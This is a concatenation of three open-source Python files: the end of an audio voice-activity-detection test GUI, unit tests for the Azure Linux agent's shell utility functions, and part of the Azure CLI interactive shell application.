self.stop()
self.reading_input = False
self.wav_file = wav_reader.WavReader(self.sample_rate, self.channels)
self.wav_file.open(filename, self.featurizer.input_size, self.speaker)
self.setup_spectrogram_image()
def update_func(frame_index):
self.process_output()
if not self.reading_input:
self.after(1, self.on_stopped)
self.set_spectrogram_image()
return (self.spectrogram_image,)
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image) (30 fps is usually fine)
self.animation = animation.FuncAnimation(self.features_figure, update_func, interval=33, blit=True)
# start background thread to read and process the audio.
self.featurizer.open(self.wav_file)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def start_recording(self):
""" Start recording audio from the microphone nd classify the audio. Note we use a background thread to
process the audio and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the microphone readings """
if self.microphone is None:
self.microphone = microphone.Microphone(False)
self.stop()
num_channels = 1
self.microphone.open(self.featurizer.input_size, self.sample_rate, num_channels, self.input_device)
def update_func(frame_index):
# this is an animation callback to update the UI every 33 milliseconds.
self.process_output()
self.set_spectrogram_image()
if not self.reading_input:
self.after(1, self.on_stopped)
return (self.spectrogram_image,)
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image) (30 fps is usually fine)
self.animation = animation.FuncAnimation(self.features_figure, update_func, interval=33, blit=True)
# start background thread to read and process the recorded audio.
self.featurizer.open(self.microphone)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def on_read_features(self):
""" this is the background thread entry point. So we read the feature data in a loop """
try:
while self.reading_input and self.featurizer:
feature_data = self.featurizer.read()
if feature_data is None:
break # eof
else:
signal = self.vad.process(feature_data)
self.levels += [ self.vad.level ]
self.signals += [ signal ]
self.lock.acquire()
if self.show_spectrogram:
self.accumulate_spectrogram_image(feature_data)
self.lock.release()
except Exception:
errorType, value, traceback = sys.exc_info()
print("### Exception reading input: " + str(errorType) + ": " + str(value) + " " + str(traceback))
while traceback:
print(traceback.tb_frame.f_code)
traceback = traceback.tb_next
self.reading_input = False
def main(featurizer, input_device, wav_file, sample_rate):
""" Main function to create root UI and AudioDemo object, then run the main UI loop """
root = tk.Tk()
root.geometry("800x800")
app = VadTest(featurizer, input_device, wav_file, sample_rate)
root.bind("+", app.on_plus_key)
root.bind("-", app.on_minus_key)
while True:
try:
root.mainloop()
break
except UnicodeDecodeError:
pass
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Test a feature model and optional classifier in a handy GUI app")
# options
arg_parser.add_argument("--featurizer", "-m", help="Compiled ELL model to use for generating features", default=None)
arg_parser.add_argument("--input_device", "-d", help="Index of input device (see --list_devices)", default=1, type=int)
arg_parser.add_argument("--list_devices", help="List available input devices", action="store_true")
arg_parser.add_argument("--wav_file", help="Provide an input wav file to test", default=None)
arg_parser.add_argument("--sample_rate", type=int, help="The sample rate that featurizer is setup to use", default=16000)
args = arg_parser.parse_args()
if args.list_devices:
microphone.list_devices()
else:
main(args.featurizer, args.input_device, args.wav_file, args.sample_rate)
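# Hypothetical example invocation (script and model paths are illustrative only, not from the original source):
#   python vad_test.py --featurizer compiled_featurizer/mfcc --wav_file test.wav --sample_rate 16000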
|
test_shell_util.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import signal
import subprocess
import tempfile
import threading
import unittest
from azurelinuxagent.common.future import ustr
import azurelinuxagent.common.utils.shellutil as shellutil
from tests.tools import AgentTestCase, patch
from tests.utils.miscellaneous_tools import wait_for, format_processes
class ShellQuoteTestCase(AgentTestCase):
def test_shellquote(self):
self.assertEqual("\'foo\'", shellutil.quote("foo"))
self.assertEqual("\'foo bar\'", shellutil.quote("foo bar"))
self.assertEqual("'foo'\\''bar'", shellutil.quote("foo\'bar"))
class RunTestCase(AgentTestCase):
def test_it_should_return_the_exit_code_of_the_command(self):
exit_code = shellutil.run("exit 123")
self.assertEqual(123, exit_code)
def test_it_should_be_a_pass_thru_to_run_get_output(self):
with patch.object(shellutil, "run_get_output", return_value=(0, "")) as mock_run_get_output:
shellutil.run("echo hello word!", chk_err=False, expected_errors=[1, 2, 3])
self.assertEqual(mock_run_get_output.call_count, 1)
args, kwargs = mock_run_get_output.call_args
self.assertEqual(args[0], "echo hello word!")
self.assertEqual(kwargs["chk_err"], False)
self.assertEqual(kwargs["expected_errors"], [1, 2, 3])
class RunGetOutputTestCase(AgentTestCase):
def test_run_get_output(self):
output = shellutil.run_get_output(u"ls /")
self.assertNotEqual(None, output)
self.assertEqual(0, output[0])
err = shellutil.run_get_output(u"ls /not-exists")
self.assertNotEqual(0, err[0])
err = shellutil.run_get_output(u"ls 我")
self.assertNotEqual(0, err[0])
def test_it_should_log_the_command(self):
command = "echo hello world!"
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command)
self.assertEqual(mock_logger.verbose.call_count, 1)
args, kwargs = mock_logger.verbose.call_args # pylint: disable=unused-variable
command_in_message = args[1]
self.assertEqual(command_in_message, command)
def test_it_should_log_command_failures_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False)
self.assertEqual(mock_logger.error.call_count, 1)
args, _ = mock_logger.error.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0, "Did not expect any info messages. Got: {0}".format(mock_logger.info.call_args_list))
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
def test_it_should_log_expected_errors_as_info(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code])
self.assertEqual(mock_logger.info.call_count, 1)
args, _ = mock_logger.info.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any errors. Got: {0}".format(mock_logger.error.call_args_list))
def test_it_should_log_unexpected_errors_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code + 1])
self.assertEqual(mock_logger.error.call_count, 1)
args, _ = mock_logger.error.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0, "Did not expect any info messages. Got: {0}".format(mock_logger.info.call_args_list))
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
class RunCommandTestCase(AgentTestCase):
"""
Tests for shellutil.run_command/run_pipe
"""
def __create_tee_script(self, return_code=0):
"""
Creates a Python script that tees its stdin to stdout and stderr
"""
tee_script = os.path.join(self.tmp_dir, "tee.py")
AgentTestCase.create_script(tee_script, """
import sys
for line in sys.stdin:
sys.stdout.write(line)
sys.stderr.write(line)
exit({0})
""".format(return_code))
return tee_script
def test_run_command_should_execute_the_command(self):
command = ["echo", "-n", "A TEST STRING"]
ret = shellutil.run_command(command)
self.assertEqual(ret, "A TEST STRING")
def test_run_command_should_use_popen_arg_list(self):
with patch("azurelinuxagent.common.utils.shellutil.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
command = ["echo", "-n", "A TEST STRING"]
ret = shellutil.run_command(command)
self.assertEqual(ret, "A TEST STRING")
self.assertEqual(popen_patch.call_count, 1)
args, kwargs = popen_patch.call_args
self.assertTrue(any(arg for arg in args[0] if "A TEST STRING" in arg), "command not being used")
self.assertEqual(kwargs['env'].get(shellutil.PARENT_PROCESS_NAME), shellutil.AZURE_GUEST_AGENT,
"Env flag not being used")
def test_run_pipe_should_execute_a_pipe_with_two_commands(self):
# Output the same string 3 times and then remove duplicates
test_string = "A TEST STRING\n"
pipe = [["echo", "-n", "-e", test_string * 3], ["uniq"]]
output = shellutil.run_pipe(pipe)
self.assertEqual(output, test_string)
def test_run_pipe_should_execute_a_pipe_with_more_than_two_commands(self):
#
# The test pipe splits the output of "ls" in lines and then greps for "."
#
# Sample output of "ls -d .":
# drwxrwxr-x 13 nam nam 4096 Nov 13 16:54 .
#
pipe = [["ls", "-ld", "."], ["sed", "-r", "s/\\s+/\\n/g"], ["grep", "\\."]]
output = shellutil.run_pipe(pipe)
self.assertEqual(".\n", output, "The pipe did not produce the expected output. Got: {0}".format(output))
def __it_should_raise_an_exception_when_the_command_fails(self, action):
with self.assertRaises(shellutil.CommandError) as context_manager:
action()
exception = context_manager.exception
self.assertIn("tee.py", str(exception), "The CommandError does not include the expected command")
self.assertEqual(1, exception.returncode, "Unexpected return value from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stdout, "Unexpected stdout from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stderr, "Unexpected stderr from the test pipe")
def test_run_command_should_raise_an_exception_when_the_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_command(tee_script, input="TEST_STRING\n"))
def test_run_pipe_should_raise_an_exception_when_the_last_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_pipe([["echo", "-n", "TEST_STRING\n"], [tee_script]]))
def __it_should_raise_an_exception_when_it_cannot_execute_the_command(self, action):
with self.assertRaises(Exception) as context_manager:
action()
exception = context_manager.exception
self.assertIn("No such file or directory", str(exception))
def test_run_command_should_raise_an_exception_when_it_cannot_execute_the_command(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_command("nonexistent_command"))
def test_run_pipe_should_raise_an_exception_when_it_cannot_execute_the_pipe(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_pipe([["ls", "-ld", "."], ["nonexistent_command"], ["wc", "-l"]]))
def __it_should_not_log_by_default(self, action):
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
try:
action()
except Exception:
pass
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any WARNINGS; Got: {0}".format(mock_logger.warn.call_args))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any ERRORS; Got: {0}".format(mock_logger.error.call_args))
def test_run_command_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_command(["ls", "nonexistent_file"])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_command("nonexistent_command")) # Raises an OSError
def test_run_pipe_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], [self.__create_tee_script(return_code=1)]])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], ["nonexistent_command"]])) # Raises an OSError
def __it_should_log_an_error_when_log_error_is_set(self, action, command):
with patch("azurelinuxagent.common.utils.shellutil.logger.error") as mock_log_error:
try:
action()
except Exception:
pass
self.assertEqual(mock_log_error.call_count, 1)
args, _ = mock_log_error.call_args
self.assertTrue(any(command in str(a) for a in args), "The command was not logged")
self.assertTrue(any("2" in str(a) for a in args), "The command's return code was not logged") # errno 2: No such file or directory
def test_run_command_should_log_an_error_when_log_error_is_set(self):
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command(["ls", "file-does-not-exist"], log_error=True), # Raises a CommandError
command="ls")
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command("command-does-not-exist", log_error=True), # Raises a CommandError
command="command-does-not-exist")
def test_run_command_should_raise_when_both_the_input_and_stdin_parameters_are_specified(self):
with tempfile.TemporaryFile() as input_file:
with self.assertRaises(ValueError):
shellutil.run_command(["cat"], input='0123456789ABCDEF', stdin=input_file)
def test_run_command_should_read_the_command_input_from_the_input_parameter_when_it_is_a_string(self):
command_input = 'TEST STRING'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_stdin_from_the_input_parameter_when_it_is_a_sequence_of_bytes(self):
command_input = 'TEST BYTES'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def __it_should_read_the_command_input_from_the_stdin_parameter(self, action):
command_input = 'TEST STRING\n'
with tempfile.TemporaryFile() as input_file:
input_file.write(command_input.encode())
input_file.seek(0)
output = action(stdin=input_file)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_command(["cat"], stdin=stdin))
def test_run_pipe_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_pipe([["cat"], ["sort"]], stdin=stdin))
def __it_should_write_the_command_output_to_the_stdout_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
captured_output = action(stdout=output_file)
output_file.seek(0)
command_output = ustr(output_file.read(), encoding='utf-8', errors='backslashreplace')
self.assertEqual(command_output, "TEST STRING\n", "The command did not produce the correct output; the output should match the input")
self.assertEqual("", captured_output, "No output should have been captured since it was redirected to a file. Output: [{0}]".format(captured_output))
def test_run_command_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_command(["echo", "TEST STRING"], stdout=stdout))
def test_run_pipe_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_pipe([["echo", "TEST STRING"], ["sort"]], stdout=stdout))
def __it_should_write_the_command_error_output_to_the_stderr_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
action(stderr=output_file)
output_file.seek(0)
command_error_output = ustr(output_file.read(), encoding='utf-8', errors="backslashreplace")
self.assertEqual("TEST STRING\n", command_error_output, "stderr was not redirected to the output file correctly")
def test_run_command_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_command(self.__create_tee_script(), input="TEST STRING\n", stderr=stderr))
def test_run_pipe_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], stderr=stderr))
def test_run_pipe_should_capture_the_stderr_of_all_the_commands_in_the_pipe(self):
with self.assertRaises(shellutil.CommandError) as context_manager:
shellutil.run_pipe([
["echo", "TEST STRING"],
[self.__create_tee_script()],
[self.__create_tee_script()],
[self.__create_tee_script(return_code=1)]])
self.assertEqual("TEST STRING\n" * 3, context_manager.exception.stderr, "Expected 3 copies of the test string since there are 3 commands in the pipe")
def test_run_command_should_return_a_string_by_default(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING")
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_string_by_default(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]])
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_command_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING", encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
def test_run_command_run_pipe_run_get_output_should_keep_track_of_the_running_commands(self):
# The children processes run this script, which creates a file with the PIDs of the script and its parent and then sleeps for a long time
child_script = os.path.join(self.tmp_dir, "write_pids.py")
AgentTestCase.create_script(child_script, """
import os
import sys
import time
with open(sys.argv[1], "w") as pid_file:
pid_file.write("{0} {1}".format(os.getpid(), os.getppid()))
time.sleep(120)
""")
threads = []
try:
child_processes = []
parent_processes = []
try:
# each of these files will contain the PIDs of the command that created it and its parent
pid_files = [os.path.join(self.tmp_dir, "pids.txt.{0}".format(i)) for i in range(4)]
# we test these functions in shellutil
commands_to_execute = [
# run_get_output must be the first in this list; see the code to fetch the PIDs a few lines below
lambda: shellutil.run_get_output("{0} {1}".format(child_script, pid_files[0])),
lambda: shellutil.run_command([child_script, pid_files[1]]),
lambda: shellutil.run_pipe([[child_script, pid_files[2]], [child_script, pid_files[3]]]),
]
# start each command on a separate thread (since we need to examine the processes running the commands while they are running)
def invoke(command):
try:
command()
except shellutil.CommandError as command_error:
if command_error.returncode != -9: # test cleanup terminates the commands, so this is expected
raise
for cmd in commands_to_execute:
thread = threading.Thread(target=invoke, args=(cmd,))
thread.start()
threads.append(thread)
# now fetch the PIDs in the files created by the commands, but wait until they are created
if not wait_for(lambda: all(os.path.exists(file) and os.path.getsize(file) > 0 for file in pid_files)):
raise Exception("The child processes did not start within the allowed timeout")
for sig_file in pid_files:
with open(sig_file, "r") as read_handle:
pids = read_handle.read().split()
child_processes.append(int(pids[0]))
parent_processes.append(int(pids[1]))
# the first item in the PIDs we fetched corresponds to run_get_output, which invokes the command using the
# shell, so in that case we need to use the parent's pid (i.e. the shell that we started)
started_commands = parent_processes[0:1] + child_processes[1:]
# wait for all the commands to start
def all_commands_running():
all_commands_running.running_commands = shellutil.get_running_commands()
return len(all_commands_running.running_commands) >= len(commands_to_execute) + 1 # +1 because run_pipe starts 2 commands
all_commands_running.running_commands = []
if not wait_for(all_commands_running):
self.fail("shellutil.get_running_commands() did not report the expected number of commands after the allowed timeout.\nExpected: {0}\nGot: {1}".format(
format_processes(started_commands), format_processes(all_commands_running.running_commands)))
started_commands.sort()
all_commands_running.running_commands.sort()
self.assertEqual(
started_commands,
all_commands_running.running_commands,
"shellutil.get_running_commands() did not return the expected commands.\nExpected: {0}\nGot: {1}".format(
format_processes(started_commands), format_processes(all_commands_running.running_commands)))
finally:
# terminate the child processes, since they are blocked
for pid in child_processes:
os.kill(pid, signal.SIGKILL)
# once the processes complete, their PIDs should go away
def no_commands_running():
no_commands_running.running_commands = shellutil.get_running_commands()
return len(no_commands_running.running_commands) == 0
no_commands_running.running_commands = []
if not wait_for(no_commands_running):
self.fail("shellutil.get_running_commands() should return empty after the commands complete. Got: {0}".format(
format_processes(no_commands_running.running_commands)))
finally:
for thread in threads:
thread.join(timeout=5)
if __name__ == '__main__':
unittest.main()
|
app.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import unicode_literals, print_function
import datetime
import json
import math
import os
import re
import subprocess
import sys
from threading import Thread
from six.moves import configparser
from knack.log import get_logger
from knack.util import CLIError
from azure.cli.core._profile import _SUBSCRIPTION_NAME, Profile
from azure.cli.core._session import ACCOUNT, CONFIG, SESSION
from azure.cli.core.api import get_config_dir
from azure.cli.core.util import handle_exception
# pylint: disable=import-error
import jmespath
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.document import Document
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import Always
from prompt_toolkit.history import FileHistory
from prompt_toolkit.interface import Application, CommandLineInterface
from prompt_toolkit.shortcuts import create_eventloop
# pylint: enable=import-error
from . import VERSION
from .az_completer import AzCompleter
from .az_lexer import get_az_lexer, ExampleLexer, ToolbarLexer
from .configuration import Configuration, SELECT_SYMBOL
from .frequency_heuristic import DISPLAY_TIME, frequency_heuristic
from .gather_commands import add_new_lines, GatherCommands
from .key_bindings import InteractiveKeyBindings
from .layout import LayoutManager
from .progress import progress_view
from . import telemetry
from .threads import LoadCommandTableThread
from .util import get_window_dim, parse_quotes, get_os_clear_screen_word
NOTIFICATIONS = ""
PART_SCREEN_EXAMPLE = .3
START_TIME = datetime.datetime.utcnow()
CLEAR_WORD = get_os_clear_screen_word()
_ENV_ADDITIONAL_USER_AGENT = 'AZURE_HTTP_USER_AGENT'
logger = get_logger(__name__)
def space_toolbar(settings_items, empty_space):
""" formats the toolbar """
counter = 0
for part in settings_items:
counter += len(part)
if len(settings_items) == 1:
spacing = ''
else:
spacing = empty_space[
:int(math.floor((len(empty_space) - counter) / (len(settings_items) - 1)))]
settings = spacing.join(settings_items)
empty_space = empty_space[len(NOTIFICATIONS) + len(settings) + 1:]
return settings, empty_space
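# Illustrative sketch (not from the original source): given
#   settings_items = ["[F1]Layout", "[F2]Defaults", "[Ctrl+D]Quit"]
# and an 80-character blank string, the items are joined with evenly sized spacers
# and the unused tail of the blank string is returned for right padding.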
# pylint: disable=too-many-instance-attributes
class AzInteractiveShell(object):
def __init__(self, cli_ctx, style=None, completer=None,
lexer=None, history=None,
input_custom=sys.stdin, output_custom=None,
user_feedback=False, intermediate_sleep=.25, final_sleep=4):
from .color_styles import style_factory
self.cli_ctx = cli_ctx
self.config = Configuration(cli_ctx.config, style=style)
self.config.set_style(style)
self.style = style_factory(self.config.get_style())
try:
gathered_commands = GatherCommands(self.config)
self.completer = completer or AzCompleter(self, gathered_commands)
self.completer.initialize_command_table_attributes()
self.lexer = lexer or get_az_lexer(gathered_commands)
except IOError: # if there is no cache
self.completer = AzCompleter(self, None)
self.lexer = None
self.history = history or FileHistory(os.path.join(self.config.get_config_dir(), self.config.get_history()))
if os.environ.get(_ENV_ADDITIONAL_USER_AGENT):
os.environ[_ENV_ADDITIONAL_USER_AGENT] += ' AZURECLISHELL/' + VERSION
else:
os.environ[_ENV_ADDITIONAL_USER_AGENT] = 'AZURECLISHELL/' + VERSION
# interface/layout state, help text buffers, output handles and background-thread bookkeeping
self._cli = None
self.layout = None
self.description_docs = u''
self.param_docs = u''
self.example_docs = u''
self.last = None
self.last_exit = 0
self.user_feedback = user_feedback
self.input = input_custom
self.output = output_custom
self.config_default = ""
self.default_command = ""
self.threads = []
self.curr_thread = None
self.spin_val = -1
self.intermediate_sleep = intermediate_sleep
self.final_sleep = final_sleep
self.command_table_thread = None
# try to consolidate state information here...
# Used by key bindings and layout
self.example_page = 1
self.is_prompting = False
self.is_example_repl = False
self.is_showing_default = False
self.is_symbols = True
def __call__(self):
if self.cli_ctx.data["az_interactive_active"]:
logger.warning("You're in the interactive shell already.")
return
if self.config.BOOLEAN_STATES[self.config.config.get('DEFAULT', 'firsttime')]:
self.config.firsttime()
if not self.config.has_feedback() and frequency_heuristic(self):
print("\n\nAny comments or concerns? You can use the \'feedback\' command!" +
" We would greatly appreciate it.\n")
self.cli_ctx.data["az_interactive_active"] = True
self.run()
self.cli_ctx.data["az_interactive_active"] = False
@property
def cli(self):
""" Makes the interface or refreshes it """
if self._cli is None:
self._cli = self.create_interface()
return self._cli
def handle_cd(self, cmd):
"""changes dir """
if len(cmd) != 2:
print("Invalid syntax: cd path", file=self.output)
return
path = os.path.expandvars(os.path.expanduser(cmd[1]))
try:
os.chdir(path)
except OSError as ex:
print("cd: %s\n" % ex, file=self.output)
def on_input_timeout(self, cli):
"""
brings up the metadata for the command if there is a valid command already typed
"""
document = cli.current_buffer.document
text = document.text
text = text.replace('az ', '')
if self.default_command:
text = self.default_command + ' ' + text
param_info, example = self.generate_help_text()
self.param_docs = u'{}'.format(param_info)
self.example_docs = u'{}'.format(example)
self._update_default_info()
cli.buffers['description'].reset(
initial_document=Document(self.description_docs, cursor_position=0))
cli.buffers['parameter'].reset(
initial_document=Document(self.param_docs))
cli.buffers['examples'].reset(
initial_document=Document(self.example_docs))
cli.buffers['default_values'].reset(
initial_document=Document(
u'{}'.format(self.config_default if self.config_default else 'No Default Values')))
self._update_toolbar()
cli.request_redraw()
def restart_completer(self):
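""" rebuild the completer and lexer from freshly gathered command metadata and drop the cached interface """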
command_info = GatherCommands(self.config)
if not self.completer:
self.completer.start(command_info)
self.completer.initialize_command_table_attributes()
if not self.lexer:
self.lexer = get_az_lexer(command_info)
self._cli = None
def _space_examples(self, list_examples, rows, section_value):
""" makes the example text """
examples_with_index = []
for i, _ in list(enumerate(list_examples)):
if len(list_examples[i]) > 1:
examples_with_index.append("[" + str(i + 1) + "] " + list_examples[i][0] +
list_examples[i][1])
example = "".join(exam for exam in examples_with_index)
num_newline = example.count('\n')
page_number = ''
if num_newline > rows * PART_SCREEN_EXAMPLE and rows > PART_SCREEN_EXAMPLE * 10:
len_of_excerpt = math.floor(float(rows) * PART_SCREEN_EXAMPLE)
group = example.split('\n')
end = int(section_value * len_of_excerpt)
begin = int((section_value - 1) * len_of_excerpt)
if end < num_newline:
example = '\n'.join(group[begin:end]) + "\n"
else:
# default chops top off
example = '\n'.join(group[begin:]) + "\n"
while ((section_value - 1) * len_of_excerpt) > num_newline:
self.example_page -= 1
page_number = '\n' + str(section_value) + "/" + str(int(math.ceil(num_newline / len_of_excerpt)))
return example + page_number + ' CTRL+Y (^) CTRL+N (v)'
def _update_toolbar(self):
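""" refresh the bottom toolbar: feedback hint, loading status, or the layout/keys/subscription info """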
cli = self.cli
_, cols = get_window_dim()
cols = int(cols)
empty_space = " " * cols
delta = datetime.datetime.utcnow() - START_TIME
if self.user_feedback and delta.seconds < DISPLAY_TIME:
toolbar = [
' Try out the \'feedback\' command',
'If refreshed disappear in: {}'.format(str(DISPLAY_TIME - delta.seconds))]
elif self.command_table_thread.is_alive():
toolbar = [
' Loading...',
'Hit [enter] to refresh'
]
else:
toolbar = self._toolbar_info()
toolbar, empty_space = space_toolbar(toolbar, empty_space)
cli.buffers['bottom_toolbar'].reset(
initial_document=Document(u'{}{}{}'.format(NOTIFICATIONS, toolbar, empty_space)))
def _toolbar_info(self):
sub_name = ""
try:
profile = Profile(cli_ctx=self.cli_ctx)
sub_name = profile.get_subscription()[_SUBSCRIPTION_NAME]
except CLIError:
pass
curr_cloud = "Cloud: {}".format(self.cli_ctx.cloud.name)
tool_val = 'Subscription: {}'.format(sub_name) if sub_name else curr_cloud
settings_items = [
" [F1]Layout",
"[F2]Defaults",
"[F3]Keys",
"[Ctrl+D]Quit",
tool_val
]
return settings_items
def generate_help_text(self):
""" generates the help text based on commands typed """
param_descrip = example = ""
self.description_docs = u''
rows, _ = get_window_dim()
rows = int(rows)
param_args = self.completer.leftover_args
last_word = self.completer.unfinished_word
command = self.completer.current_command
new_command = ' '.join([command, last_word]).strip()
if not self.completer.complete_command and new_command in self.completer.command_description:
command = new_command
# get command/group help
if self.completer and command in self.completer.command_description:
self.description_docs = u'{}'.format(self.completer.command_description[command])
# get parameter help if full command
if self.completer and command in self.completer.command_param_info:
param = param_args[-1] if param_args else ''
param = last_word if last_word.startswith('-') else param
if param in self.completer.command_param_info[command] and self.completer.has_description(
command + " " + param):
param_descrip = ''.join([
param, ":", '\n', self.completer.param_description.get(command + " " + param, '')])
if command in self.completer.command_examples:
string_example = []
for example in self.completer.command_examples[command]:
for part in example:
string_example.append(part)
''.join(string_example)
example = self._space_examples(
self.completer.command_examples[command], rows, self.example_page)
return param_descrip, example
def _update_default_info(self):
try:
defaults_section = self.cli_ctx.config.defaults_section_name
self.config_default = ""
if hasattr(self.cli_ctx.config, 'config_parser'):
options = self.cli_ctx.config.config_parser.options(defaults_section)
else:
return
for opt in options:
self.config_default += opt + ": " + self.cli_ctx.config.get(defaults_section, opt) + " "
except configparser.NoSectionError:
self.config_default = ""
def create_application(self, full_layout=True):
""" makes the application object and the buffers """
layout_manager = LayoutManager(self)
if full_layout:
layout = layout_manager.create_layout(ExampleLexer, ToolbarLexer)
else:
layout = layout_manager.create_tutorial_layout()
buffers = {
DEFAULT_BUFFER: Buffer(is_multiline=True),
'description': Buffer(is_multiline=True, read_only=True),
'parameter': Buffer(is_multiline=True, read_only=True),
'examples': Buffer(is_multiline=True, read_only=True),
'bottom_toolbar': Buffer(is_multiline=True),
'example_line': Buffer(is_multiline=True),
'default_values': Buffer(),
'symbols': Buffer(),
'progress': Buffer(is_multiline=False)
}
writing_buffer = Buffer(
history=self.history,
auto_suggest=AutoSuggestFromHistory(),
enable_history_search=True,
completer=self.completer,
complete_while_typing=Always()
)
return Application(
mouse_support=False,
style=self.style,
buffer=writing_buffer,
on_input_timeout=self.on_input_timeout,
key_bindings_registry=InteractiveKeyBindings(self).registry,
layout=layout,
buffers=buffers,
)
def create_interface(self):
""" instantiates the interface """
return CommandLineInterface(
application=self.create_application(),
eventloop=create_eventloop())
def set_prompt(self, prompt_command="", position=0):
""" writes the prompt line """
self.description_docs = u'{}'.format(prompt_command)
